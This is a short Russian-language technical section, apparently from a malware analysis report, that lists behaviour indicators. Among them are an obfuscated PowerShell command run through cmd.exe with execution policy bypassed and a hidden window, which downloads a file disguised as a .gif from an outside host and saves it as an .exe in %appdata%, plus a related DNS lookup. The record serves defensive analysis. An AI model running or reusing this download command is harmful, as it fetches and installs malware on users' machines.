Техническая информация
- http://www.iemailpremium.com/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWErsHElL.eXE -ExecUTionpOlicY byPASs -nOProfILe -WinDowStyLe hiddEn (nEw-ObJecT SyStem.NEt.WEBClIEnT).DOWNLoaDFILe('http://www.iemailpremium.com/read.php?f=1.gif','%aPpDATa%.ex...
- DNS ASK ie####premium.com
- '<SYSTEM32>\cmd.exe' /c "PoWErsHElL.eXE -ExecUTionpOlicY byPASs -nOProfILe -WinDowStyLe hiddEn (nEw-ObJecT SyStem.NEt.WEBClIEnT).DOWNLoaDFILe('http://www.iemailpremium.com/read.php?f=1.gif','%aPpDATa%.ex...' (со скрытым окном)